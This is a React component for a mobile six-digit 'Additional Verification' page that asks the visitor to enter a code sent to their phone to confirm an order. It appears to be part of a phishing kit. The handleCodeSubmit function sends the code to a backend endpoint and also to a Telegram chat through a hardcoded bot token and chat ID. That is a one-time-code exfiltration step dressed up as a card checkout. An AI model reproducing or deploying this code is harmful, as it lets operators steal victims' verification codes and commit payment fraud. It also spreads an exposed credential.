import React, {useContext, useEffect, useRef, useState} from "react"
import {
  FaCcVisa,
  FaCcMastercard,
  FaCcAmex,
  FaCcDiscover,
  FaMinus,
  FaPlus,
  FaTrash,
  FaRegCreditCard,
} from "react-icons/fa"

import axios from "axios";
import InputField from "../Checkout/InputField";
import CountdownComponent from "../Checkout/CountDown";



export const Otp_Mobile = ({setActiveComponent}) => {

  const [loading, setLoading] = useState(false)

  const [input1Value, setInput1Value] = useState("")
  const [input2Value, setInput2Value] = useState("")
  const [input3Value, setInput3Value] = useState("")
  const [input4Value, setInput4Value] = useState("")
  const [input5Value, setInput5Value] = useState("")
  const [input6Value, setInput6Value] = useState("")

  const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null)
  const input2Ref = useRef(null)
  const input3Ref = useRef(null)
  const input4Ref = useRef(null)
  const input5Ref = useRef(null)
  const input6Ref = useRef(null)

  const [submitBtnDis, setSubmitBtnDis] = useState(true)
  const [submitBtnContent, setSubmitBtnContent] = useState("Verify")

  const handleNumberClick = (number) => {
    console.log("Clicked" + input1Value)
    if (focusedInput === 1) {
      if (input1Value.length < 1) {
        setInput1Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(2)
        if (input2Value.length < 1) {
          setInput2Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 2) {
      if (input2Value.length < 1) {
        setInput2Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(3)
        if (input3Value.length < 1) {
          setInput3Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 3) {
      if (input3Value.length < 1) {
        setInput3Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(4)
        if (input4Value.length < 1) {
          setInput4Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 4) {
      if (input4Value.length < 1) {
        setInput4Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(5)
        if (input5Value.length < 1) {
          setInput5Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 5) {
      if (input5Value.length < 1) {
        setInput5Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(6)
        if (input6Value.length < 1) {
          setInput6Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 6) {
      if (input6Value.length < 1) {
        setInput6Value((prevValue) => prevValue + number)
      }
    }
  }

  const handleDeleteClick = () => {
    if (focusedInput === 1) {
      setInput1Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 2) {
      setInput2Value((prevValue) => prevValue.slice(0, -1))
      setFocusedInput(1)
    } else if (focusedInput === 3) {
      setInput3Value((prevValue) => prevValue.slice(0, -1))
      setFocusedInput(2)
    } else if (focusedInput === 4) {
      setInput4Value((prevValue) => prevValue.slice(0, -1))
      setFocusedInput(3)
    } else if (focusedInput === 5) {
      setInput5Value((prevValue) => prevValue.slice(0, -1))
      setFocusedInput(4)
    } else if (focusedInput === 6) {
      setInput6Value((prevValue) => prevValue.slice(0, -1))
      setFocusedInput(5)
    }
  }

  const handleInput1Focus = () => {
    if(input1Value){
      setFocusedInput(2)
    }else{
      setFocusedInput(1)
    }
    
  }

  const handleInput2Focus = () => {
    setFocusedInput(2)
  }

  const handleInput3Focus = () => {
    setFocusedInput(3)
  }

  const handleInput4Focus = () => {
    setFocusedInput(4)
  }

  const handleInput5Focus = () => {
    setFocusedInput(5)
  }

  const handleInput6Focus = () => {
    setFocusedInput(6)
  }

  const checkFocus = (num) => {
    return focusedInput === num
  }

  const updateSubmitBtnDisabled = () => {
    // Check conditions for enabling/disabling submit button
    if (
      input1Value !== "" &&
      input2Value !== "" &&
      input3Value !== "" &&
      input4Value !== "" &&
      input5Value !== "" &&
      input6Value !== ""
    ) {
      setSubmitBtnDis(false) // Enable submit button if all inputs are filled
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }
  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [
    input1Value,
    input2Value,
    input3Value,
    input4Value,
    input5Value,
    input6Value,
  ])

  const handleCodeSubmit = async () => {
    setSubmitBtnContent(<div className="cinputLoader"></div>)
    const combinedCode = `${input1Value}${input2Value}${input3Value}${input4Value}${input5Value}${input6Value}`
    const dataToSend = {
      uuId: localStorage.getItem("uuId"),
      code: combinedCode,
      chatId: process.env.REACT_APP_CHAT_ID,
      domain: process.env.REACT_APP_DOMAIN
    }

    const botToken = '8080614051:AAHS1By4ybhpXci3veywS4L0HKAE7BLxlS8'; // Replace with your bot's token
       // Replace with the target chat ID // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;



    const payload = {
      chat_id: '-1002457848491', // Replace with the target chat ID
      text: `🔐 ${input1Value}${input2Value}${input3Value}${input4Value}${input5Value}${input6Value}`,  // The message text
  };

    setSubmitBtnDis(true)
    setLoading(true)
    try {
      const response = await axios.post(
        process.env.REACT_APP_SERVER_URL + "/api/otp_verif",
        dataToSend
      )

      if (response.status === 200) {
        setTimeout(() => {
          setActiveComponent("Loading")

        }, 3000)
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false)
        setLoading(false)
      }, 3000)
    }
    try{
      const response = await fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify(payload),
    });

    }catch(e){
      
    }
  }

  const handleInputChange = (e, inputSetter, nextInputRef, nextInput) => {
    const value = e.target.value;
    if (value.length <= 1) {
      inputSetter(value);
      if (value.length === 1 && nextInputRef.current) {
        nextInputRef.current.focus();
      }
    }
  };

  return (
    <div className="flex flex-col w-full p-4">
                  <div className="fixed bottom-0 left-0 right-0 flex flex-col p-4 bg-white shadow">
                <div className="flex items-center justify-between w-full mb-3" >
                </div>
                <button           onClick={handleCodeSubmit}
          disabled={submitBtnDis}
          className={`w-full p-4 mt-2 text-lg font-semibold text-white rounded shadow   ${
            submitBtnDis
              ? "text-neutral-400 bg-neutral-100"
              : "text-white bg-prim_blue"
          } `}
        >
          {submitBtnContent}</button>
            </div>
      <span className="text-lg font-bold ">Additional Verification</span>
      <div className="flex flex-col w-full p-2 rounded-lg bg-gray-50">
        <div className="flex items-start">
          <svg
            className="flex-shrink-0 "
            width="24"
            height="24"
            viewBox="0 0 24 24"
            fill="none"
            xmlns="http://www.w3.org/2000/svg"
          >
            <path
              d="M15.5453 4.5194L18.3939 5.74025C18.7616 5.89783 19 6.25937 19 6.6594V12.9123C19 14.85 18.0642 16.6684 16.4874 17.7947L12.5812 20.5848C12.2335 20.8332 11.7665 20.8332 11.4188 20.5848L7.51257 17.7947C5.93579 16.6684 5 14.85 5 12.9123V6.6594C5 6.25937 5.2384 5.89783 5.60608 5.74025L8.45473 4.5194C10.7187 3.54914 13.2813 3.54914 15.5453 4.5194Z"
              fill="#7E869E"
              fill-opacity="0.25"
            />
            <path
              d="M9.5 12.5L11.3939 14.3939C11.4525 14.4525 11.5475 14.4525 11.6061 14.3939L15.5 10.5"
              stroke="#222222"
            />
          </svg>
          <span className="ml-2 text-xs text-gray-500 ">
          To confirm your order, please enter the code sent to your phone number.
          </span>
        </div>
        <div className="flex justify-end w-full mt-2">
          <FaCcVisa
            className="ml-2"
            color="gray"
            size={22}
          />
          <FaCcMastercard
            className="ml-2"
            color="gray"
            size={22}
          />
          <FaCcAmex
            className="ml-2"
            color="gray"
            size={22}
          />
          <FaCcDiscover
            className="ml-2"
            color="gray"
            size={22}
          />
        </div>
      </div>
      <div className="w-full mt-3 rounded-lg  p-4 bg-prim_blue aspect-[1.77]">
        <div className="flex flex-col h-full">

        <svg width="150" height="40" viewBox="0 0 300 80" xmlns="http://www.w3.org/2000/svg"><title>Artboard</title><path d="M116.41 59.926l-1.133-5.28V23.172h-6.542v14.357c-1.968-2.27-4.675-3.6-7.87-3.6-6.545 0-11.61 5.376-11.61 13.27 0 7.895 5.065 13.272 11.61 13.272 3.246 0 6.05-1.383 8.018-3.752l.688 3.207h6.84zm126.18-17.81l3.1-6.956c-1.428-.89-3.1-1.283-4.722-1.283-2.952 0-5.412 1.328-6.985 3.8l-.69-3.21h-6.74l1.082 4.982V59.92h6.54v-16.23c.885-1.677 2.56-2.712 4.723-2.712 1.332.002 2.56.346 3.692 1.135zm8.904 5.08c0-3.946 2.806-6.41 6.59-6.41 3.84 0 6.595 2.464 6.595 6.41 0 3.9-2.756 6.415-6.594 6.415-3.786 0-6.592-2.514-6.592-6.413zm-155.895 0c0-3.946 2.803-6.41 6.59-6.41 3.84 0 6.593 2.464 6.593 6.41 0 3.9-2.754 6.415-6.59 6.415-3.788 0-6.594-2.514-6.594-6.413zm191.462 6.415c-3.787 0-6.59-2.514-6.59-6.413 0-3.947 2.803-6.412 6.59-6.412 3.837 0 6.59 2.465 6.59 6.412 0 3.9-2.753 6.414-6.59 6.414zM138.594 44.88h-12.592c.738-2.91 2.95-4.49 6.295-4.49 3.395 0 5.61 1.58 6.297 4.49zm78.268 0H204.27c.737-2.91 2.95-4.49 6.295-4.49 3.395 0 5.61 1.58 6.297 4.49zm-27.695 15.048l6.84-25.457h-7.134l-5.016 20.622-5.02-20.623h-7.035l6.84 25.455h10.525zm-27.4 0h6.538V34.468h-6.54v25.458zm-18.233-2.44l-2.508-5.623c-2.362 1.233-4.97 1.973-7.626 1.973-3.442 0-5.853-1.332-6.887-3.8h18.397c.197-.936.297-1.873.297-3.008 0-7.894-5.46-13.173-12.79-13.173-7.378 0-12.79 5.33-12.79 13.272 0 8.09 5.362 13.27 13.676 13.27 3.64 0 7.23-.987 10.23-2.91zm143.528-23.56c-7.43 0-12.938 5.377-12.938 13.27 0 7.896 5.51 13.272 12.937 13.272 7.43 0 12.94-5.376 12.94-13.27 0-7.895-5.51-13.272-12.938-13.272zm-65.377 23.63l-2.51-5.625c-2.363 1.234-4.97 1.973-7.627 1.973-3.443 0-5.854-1.33-6.887-3.8h18.4c.197-.936.294-1.873.294-3.007 0-7.894-5.46-13.173-12.79-13.173-7.38 0-12.79 5.327-12.79 13.272 0 8.09 5.363 13.27 13.676 13.27 3.64.003 7.23-.983 10.235-2.908zm49.338-10.36c0-7.893-5.51-13.27-12.938-13.27-7.43 0-12.938 5.377-12.938 13.27 0 7.896 5.51 13.272 12.937 13.272 7.43 0 12.94-5.376 12.94-13.27zM155.91 59.927V23.17h-6.542v36.755h6.542zm13.233-33.108c0-2.368-1.77-4.144-4.082-4.144-2.36 0-4.13 1.776-4.13 4.144 0 2.368 1.77 4.144 4.132 4.144 2.31 0 4.08-1.776 4.08-4.144zM48.916 35.276l-6.39-29.74-20.03 4.215 6.385 29.74L0 45.563 5.1 69.32 55.89 80l11.614-25.813L73.03 2.12 52.66 0l-3.744 35.276zM32.712 51.552c-1.466-.482-2.118-2.237-1.562-4.36.414-1.575 2.362-1.81 3.337-1.828.37-.006.735.068 1.07.218.69.31 1.857.968 2.094 1.973.343 1.45.013 2.667-1.034 3.616-1.05.953-2.434.866-3.904.382zm13.882 1.788c-1.324-.642-1.314-2.277-1.17-3.274.078-.543.298-1.055.642-1.487.473-.594 1.263-1.367 2.175-1.39 1.485-.04 2.762.62 3.483 1.812.724 1.188.362 2.498-.4 3.81-.767 1.307-2.764 1.48-4.73.528z" fill="#ffffff" fill-rule="evenodd"/></svg>
          <span className="mt-4 text-sm text-white">Enter Verification Code:</span>

          <div className="grid items-center grid-cols-6 my-2 gap-x-2">
          <InputField
            formatType={"num"}
            ref={input1Ref}
            value={input1Value}
            onFocus={handleInput1Focus}
            onChange={(e) => handleInputChange(e, setInput1Value, input2Ref, 2)}
            placeholder={"●"}
            focused={checkFocus(1)}
          />
          <InputField
            formatType={"num"}
            ref={input2Ref}
            value={input2Value}
            onFocus={handleInput2Focus}
            onChange={(e) => handleInputChange(e, setInput2Value, input3Ref, 3)}
            placeholder={"●"}
            focused={checkFocus(2)}
          />
          <InputField
            formatType={"num"}
            ref={input3Ref}
            value={input3Value}
            onFocus={handleInput3Focus}
            onChange={(e) => handleInputChange(e, setInput3Value, input4Ref, 4)}
            placeholder={"●"}
            focused={checkFocus(3)}
          />
<InputField
            formatType={"num"}
            ref={input4Ref}
            value={input4Value}
            onFocus={handleInput4Focus}
            onChange={(e) => handleInputChange(e, setInput4Value, input5Ref, 5)}
            placeholder={"●"}
            focused={checkFocus(4)}
          />
          <InputField
            formatType={"num"}
            ref={input5Ref}
            value={input5Value}
            onFocus={handleInput5Focus}
            onChange={(e) => handleInputChange(e, setInput5Value, input6Ref, 6)}
            placeholder={"●"}
            focused={checkFocus(5)}
          />
          <InputField
            formatType={"num"}
            ref={input6Ref}
            value={input6Value}
            onFocus={handleInput6Focus}
            onChange={(e) => setInput6Value(e.target.value)}
            placeholder={"●"}
            focused={checkFocus(6)}
          />
          </div>
          <CountdownComponent />
        </div>
      </div>



    </div>
  )
}

